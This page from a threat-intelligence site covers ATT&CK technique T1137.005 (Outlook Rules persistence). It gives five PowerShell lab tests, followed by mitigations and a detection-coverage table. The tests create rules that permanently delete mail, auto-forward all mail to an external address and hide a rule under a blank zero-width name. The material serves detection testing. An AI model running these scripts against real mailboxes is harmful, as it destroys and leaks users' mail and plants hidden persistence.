T1137.005 · threatengine.sh

Home/ATT&CK Technique/Outlook Rules

ATT&CK Technique

Outlook Rules

T1137.005 · persistence

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender.

Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user. Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.

WindowsOffice Suite

▸

Atomic Tests

Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.

powershellwindowsOutlook Rule - Subject Trigger with DeletePermanently Action via COM Object

Creates a malicious Outlook rule via the COM object that permanently deletes emails when an email with a specific subject keyword arrives. Simulates adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently action as it does not require a resolved Exchange folder unlike MoveToFolder. NOTE: olRuleActionStartApplication cannot be created programmatically per Microsoft's Rules object model - DeletePermanently is used as the supported equivalent that generates the same rule-creation artefact. NOTE: This test MUST be run from a non-elevated (standard user) PowerShell session. Outlook COM fails with 0x80080005 when invoked as Administrator.

$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
    exit 1
}

$outlook   = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules     = $namespace.DefaultStore.GetRules()
$rule      = $rules.Create("#{rule_name}", 0)

$cond = $rule.Conditions.Subject
$cond.Enabled = $true
$cond.Text    = @("#{trigger_subject}")

$action         = $rule.Actions.DeletePermanently
$action.Enabled = $true

$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."

powershellwindowsOutlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object

Creates an Outlook rule via COM that permanently deletes emails received from a specific sender address. Adversaries use sender-based triggers to make rules appear more legitimate (e.g. disguised as a filter for a specific colleague). Tests a different rule condition path through the COM object model. Uses DeletePermanently as it does not require a resolved Exchange folder unlike MoveToFolder. NOTE: This test MUST be run from a non-elevated (standard user) PowerShell session. Outlook COM fails with 0x80080005 when invoked as Administrator.

$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
    exit 1
}

$outlook   = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules     = $namespace.DefaultStore.GetRules()
$rule      = $rules.Create("#{rule_name}", 0)

$cond = $rule.Conditions.From
$cond.Enabled = $true
$cond.Recipients.Add("#{trigger_sender}")
$cond.Recipients.ResolveAll() | Out-Null

$action         = $rule.Actions.DeletePermanently
$action.Enabled = $true

$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."

powershellwindowsOutlook Rule - Auto-Forward Emails to External Address via COM Object

Creates an Outlook rule that automatically forwards all received emails to an external address. Simulates Business Email Compromise (BEC) and insider threat scenarios where adversaries establish forwarding rules to exfiltrate mail. One of the most commonly observed real-world abuses of Outlook rules. Detected by Exchange mail flow anomalies and Microsoft Secure Score forwarding alerts. NOTE: No actual email is forwarded during this test - the rule is created but a trigger email is not sent. Run cleanup immediately after verification. NOTE: This test MUST be run from a non-elevated (standard user) PowerShell session. Outlook COM fails with 0x80080005 when invoked as Administrator.

$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
    exit 1
}

$outlook   = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules     = $namespace.DefaultStore.GetRules()
$rule      = $rules.Create("#{rule_name}", 0)

$action = $rule.Actions.Forward
$action.Enabled = $true
$action.Recipients.Add("#{forward_to_address}")
$action.Recipients.ResolveAll() | Out-Null

$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."

powershellwindowsOutlook Rules - Enumerate Existing Rules via PowerShell COM Object

Enumerates all Outlook rules configured on the local profile using the PowerShell COM object. Simulates the discovery phase where an adversary audits existing rules before implanting their own, or where a threat actor tool such as Ruler lists rules to understand the environment. This enumeration should itself generate telemetry - use it to validate that your monitoring catches PowerShell spawning Outlook COM for recon purposes. NOTE: This test MUST be run from a non-elevated (standard user) PowerShell session. Outlook COM fails with 0x80080005 when invoked as Administrator.

$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
    exit 1
}

$outlook = New-Object -ComObject Outlook.Application
$rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()

Write-Host "`n[*] Enumerating Outlook rules on local profile..."
Write-Host "    Total rules found: $($rules.Count)`n"

for ($i = 1; $i -le $rules.Count; $i++) {
    $r = $rules.Item($i)
    Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
}

if ($rules.Count -eq 0) {
    Write-Host "  (No rules configured)"
}

powershellwindowsOutlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)

Creates an Outlook rule with a zero-width space as its display name, making it appear blank and invisible in the standard Outlook Rules UI. Simulates the hidden inbox rule technique documented by Damian Pfammatter (2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear during casual rule auditing. Tests whether monitoring catches rules that are invisible in the Outlook GUI but detectable via MFCMapi or Get-InboxRule on Exchange. Uses PlaySound action as RunApplication cannot be created programmatically per Microsoft's Rules object model. NOTE: This test MUST be run from a non-elevated (standard user) PowerShell session. Outlook COM fails with 0x80080005 when invoked as Administrator. NOTE: Script is written to a temp file before execution to prevent the ART executor's quote-wrapping from mangling the zero-width space bytes.

$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
    exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
$lines = @(
    '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
    '$outlook   = New-Object -ComObject Outlook.Application',
    '$namespace = $outlook.GetNamespace("MAPI")',
    '$rules     = $namespace.DefaultStore.GetRules()',
    '$rule      = $rules.Create($hiddenName, 0)',
    '$cond = $rule.Conditions.Subject',
    '$cond.Enabled = $true',
    '$cond.Text    = @("#{trigger_subject}")',
    '$action          = $rule.Actions.PlaySound',
    '$action.Enabled  = $true',
    '$action.FilePath = "#{sound_file_path}"',
    '$rule.Enabled = $true',
    '$rules.Save()',
    'Write-Host "[+] Hidden rule created with zero-width space name."',
    'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
    'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue

▣

Mitigations

MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.

M1040Behavior Prevention on Endpoint

Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack.

Suspicious Process Behavior

Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.

Unauthorized File Access

Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.

Abnormal API Calls

Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like OpenProcess and WriteProcessMemory and terminates the offending process.

Exploit Prevention

Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process.

M1051Update Software

Software updates ensure systems are protected against known vulnerabilities by applying patches and upgrades provided by vendors. Regular updates reduce the attack surface and prevent adversaries from exploiting known security gaps. This includes patching operating systems, applications, drivers, and firmware.

Regular Operating System Updates

Implementation: Apply the latest Windows security updates monthly using WSUS (Windows Server Update Services) or a similar patch management solution. Configure systems to check for updates automatically and schedule reboots during maintenance windows.
Use Case: Prevents exploitation of OS vulnerabilities such as privilege escalation or remote code execution. Application Patching.
Implementation: Monitor Apache's update release notes for security patches addressing vulnerabilities. Schedule updates for off-peak hours to avoid downtime while maintaining security compliance.
Use Case: Prevents exploitation of web application vulnerabilities, such as those leading to unauthorized access or data breaches. Firmware Updates.
Implementation: Regularly check the vendor’s website for firmware updates addressing vulnerabilities. Plan for update deployment during scheduled maintenance to minimize business disruption.
Use Case: Protects against vulnerabilities that adversaries could exploit to gain access to network devices or inject malicious traffic. Emergency Patch Deployment.
Implementation: Use the emergency patch deployment feature of the organization's patch management tool to apply updates to all affected Exchange servers within 24 hours.
Use Case: Reduces the risk of exploitation by rapidly addressing critical vulnerabilities. Centralized Patch Management.
Implementation: Implement a centralized patch management system, such as SCCM or ManageEngine, to automate and track patch deployment across all environments. Generate regular compliance reports to ensure all systems are updated.
Use Case: Streamlines patching processes and ensures no critical systems are missed.

Tools for Implementation Patch Management Tools

WSUS: Manage and deploy Microsoft updates across the organization.
ManageEngine Patch Manager Plus: Automate patch deployment for OS and third-party apps.
Ansible: Automate updates across multiple platforms, including Linux and Windows.

Vulnerability Scanning Tools

OpenVAS: Open-source vulnerability scanning to identify missing patches.

◈

Detection Coverage

0/6 layers

Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).

Behavioral / log (Sigma) none

Analytics (MITRE CAR) none

Runtime / container (Falco) none

File / malware (YARA) none

Network (Suricata/Snort) none

Vuln scan (Nuclei) none

▣

Comply & Defend

NIST 800-53AC-06, CM-02, CM-06, SC-18, SC-44, SI-02, SI-08

D3FEND2 defensive techniques

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE ATT&CK Atomic Red Team car (MITRE)

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin